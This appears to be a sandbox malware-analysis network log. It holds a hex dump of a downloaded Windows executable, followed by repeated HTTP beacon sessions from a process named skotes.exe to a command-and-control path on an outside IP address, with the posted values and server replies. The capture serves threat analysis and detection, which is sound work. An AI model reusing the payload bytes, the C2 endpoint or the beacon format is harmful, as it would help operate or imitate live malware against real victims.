                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_"00O `@ @`LOO` 0O H.text/ 0 `.rsrc`2@@.reloc @BOHh~DU (*(*~-rp(os~*~**j(r=p~ot*j(rMp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*~*(*Vs(t*N(((*0f(8Mo9:oo-
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:00.422518969 CET1236INData Raw: 61 02 7b 11 00 00 04 1b 8d 3c 00 00 01 25 16 09 6f 1f 00 00 0a a2 25 17 72 2f 01 00 70 a2 25 18 11 05 28 12 00 00 06 a2 25 19 72 33 01 00 70 a2 25 1a 11 04 28 12 00 00 06 a2 28 20 00 00 0a 6f 21 00 00 0a 02 7b 12 00 00 04 11 05 1f 64 6a 5a 11 04
                                                                                                                                                                                                                                                Data Ascii: a{<%o%r/p%(%r3p%(( o!{djZ[("o#83^{<%o%r/p%(%r3p%(( o!{djZ[("o#+`3\{<%o%r/p%(%r3
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:00.422544956 CET1236INData Raw: 7b 17 00 00 04 19 6f 48 00 00 0a 02 7b 17 00 00 04 16 6f 49 00 00 0a 02 7b 17 00 00 04 72 1d 02 00 70 6f 4a 00 00 0a 02 7b 17 00 00 04 28 4b 00 00 0a 6f 4c 00 00 0a 02 7b 17 00 00 04 28 4d 00 00 0a 6f 4e 00 00 0a 02 7b 17 00 00 04 72 35 02 00 70
                                                                                                                                                                                                                                                Data Ascii: {oH{oI{rpoJ{(KoL{(MoN{r5p"AsOoP{(<oQ{rKpoRtPoS{oT{oU{oV{oW{oX{oY{#oZ{o
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:00.422559023 CET1236INData Raw: 45 00 00 0a 02 7b 08 00 00 04 72 39 03 00 70 6f 21 00 00 0a 02 7b 09 00 00 04 28 46 00 00 0a 6f 47 00 00 0a 02 7b 09 00 00 04 28 3c 00 00 0a 6f 39 00 00 0a 02 7b 09 00 00 04 19 6f 48 00 00 0a 02 7b 09 00 00 04 16 6f 49 00 00 0a 02 7b 09 00 00 04
                                                                                                                                                                                                                                                Data Ascii: E{r9po!{(FoG{(<o9{oH{oI{rqpoJ{(KoL{(MoN{r5p"AsOoP{(<oQ{rypoRtPoS{oT{oU{oV{oW
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:00.422931910 CET896INData Raw: 7b 0b 00 00 04 1a 1b 1a 1b 73 40 00 00 0a 6f 41 00 00 0a 02 7b 0b 00 00 04 72 47 04 00 70 6f 42 00 00 0a 02 7b 0b 00 00 04 20 2c 05 00 00 20 81 00 00 00 73 43 00 00 0a 6f 44 00 00 0a 02 7b 0b 00 00 04 1e 6f 45 00 00 0a 02 7b 0b 00 00 04 02 fe 06
                                                                                                                                                                                                                                                Data Ascii: {s@oA{rGpoB{ , sCoD{oE{skol{oi{rUp"@AsOoP{Es>o?{s@oA{rwpoB{ #sCoD{oE{rpo!
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:00.422946930 CET1236INData Raw: 11 00 00 04 72 6d 05 00 70 6f 42 00 00 0a 02 7b 11 00 00 04 20 96 00 00 00 1f 2a 73 43 00 00 0a 6f 44 00 00 0a 02 7b 11 00 00 04 1f 0b 6f 45 00 00 0a 02 7b 11 00 00 04 72 93 05 00 70 6f 21 00 00 0a 02 7b 11 00 00 04 02 fe 06 17 00 00 06 73 67 00
                                                                                                                                                                                                                                                Data Ascii: rmpoB{ *sCoD{oE{rpo!{sgoh{oi{r5p"dAsOoP{zs>o?{s@oA{rpoB{ *sCoD{oE{rpo!{
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:00.422960997 CET1236INData Raw: 72 35 02 00 70 22 00 00 7c 41 16 19 16 73 4f 00 00 0a 6f 50 00 00 0a 02 7b 15 00 00 04 28 46 00 00 0a 6f 3d 00 00 0a 02 7b 15 00 00 04 17 6f 85 00 00 0a 02 7b 15 00 00 04 1f 14 6f 86 00 00 0a 02 7b 15 00 00 04 28 3c 00 00 0a 6f 87 00 00 0a 02 7b
                                                                                                                                                                                                                                                Data Ascii: r5p"|AsOoP{(Fo={o{o{(<o{(Fo{(Fo{ ?s>o?{s@oA{rpoB{ jmsCoD{oE{ o{sg
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:00.422972918 CET1236INData Raw: 7b 1d 00 00 04 6f 3a 00 00 0a 02 7b 20 00 00 04 6f 3b 00 00 0a 02 7b 1d 00 00 04 28 3c 00 00 0a 6f 3d 00 00 0a 02 7b 1d 00 00 04 1f f8 1f f5 73 3e 00 00 0a 6f 3f 00 00 0a 02 7b 1d 00 00 04 1a 1b 1a 1b 73 40 00 00 0a 6f 41 00 00 0a 02 7b 1d 00 00
                                                                                                                                                                                                                                                Data Ascii: {o:{ o;{(<o={s>o?{s@oA{rGpoB{ sCoD{oE{)skol{oi{rUp"@AsOoP{Ss>o?{s@oA{rw
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:00.422986031 CET1236INData Raw: 04 17 6f 59 00 00 0a 02 7b 27 00 00 04 23 00 00 00 00 00 00 00 00 6f 5a 00 00 0a 02 7b 27 00 00 04 17 6f 5b 00 00 0a 02 7b 27 00 00 04 23 00 00 00 00 00 80 56 40 6f 5c 00 00 0a 02 7b 27 00 00 04 16 6f 5d 00 00 0a 02 7b 27 00 00 04 1f 09 20 f5 00
                                                                                                                                                                                                                                                Data Ascii: oY{'#oZ{'o[{'#V@o\{'o]{' s>o?{'s@oA{'rpoB{'(<o^{'(_o`{'(aob{'oc{' AUsCoD{'oE{'rpo!{
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:00.422997952 CET896INData Raw: 00 04 14 6f 56 00 00 0a 02 7b 25 00 00 04 16 6f 57 00 00 0a 02 7b 25 00 00 04 16 6f 58 00 00 0a 02 7b 25 00 00 04 17 6f 59 00 00 0a 02 7b 25 00 00 04 23 00 00 00 00 00 00 00 00 6f 5a 00 00 0a 02 7b 25 00 00 04 17 6f 5b 00 00 0a 02 7b 25 00 00 04
                                                                                                                                                                                                                                                Data Ascii: oV{%oW{%oX{%oY{%#oZ{%o[{%#V@o\{%o]{% s>o?{%s@oA{%rpoB{%(_o^{%(_o`{%(aob{%oc{% AUsC
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:00.542664051 CET1236INData Raw: 02 7b 26 00 00 04 02 fe 06 25 00 00 06 73 67 00 00 0a 6f 68 00 00 0a 02 7b 28 00 00 04 6f 3a 00 00 0a 02 7b 2b 00 00 04 6f 3b 00 00 0a 02 7b 28 00 00 04 6f 3a 00 00 0a 02 7b 2a 00 00 04 6f 3b 00 00 0a 02 7b 28 00 00 04 6f 3a 00 00 0a 02 7b 29 00
                                                                                                                                                                                                                                                Data Ascii: {&%sgoh{(o:{+o;{(o:{*o;{(o:{)o;{( L s>o?{(s@oA{(rgpoB{( jsCoD{(oE{+ |s>o?{+s@oA{+ro


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                68192.168.2.450457185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:00.492666006 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:01.873507023 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:01 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                69192.168.2.450460185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:03.564977884 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:04.906354904 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:04 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                70192.168.2.450463185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:06.884175062 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:08.233194113 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:08 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                71192.168.2.450466185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:09.877681971 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:11.231045008 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:11 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                72192.168.2.450479185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:13.423238993 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:14.805979013 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:14 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                73192.168.2.450484185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:16.585282087 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:17.917598963 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:17 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                74192.168.2.450487185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:20.352422953 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:21.570710897 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:21 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                75192.168.2.450490185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:23.520735025 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:24.795615911 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:24 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                76192.168.2.450497185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:28.257143974 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:29.608927965 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:29 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                77192.168.2.450500185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:31.355714083 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:32.722193003 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:32 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                78192.168.2.450503185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:34.353571892 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                79192.168.2.450505185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:36.365581036 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:37.827188015 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:37 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                80192.168.2.450508185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:39.465825081 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
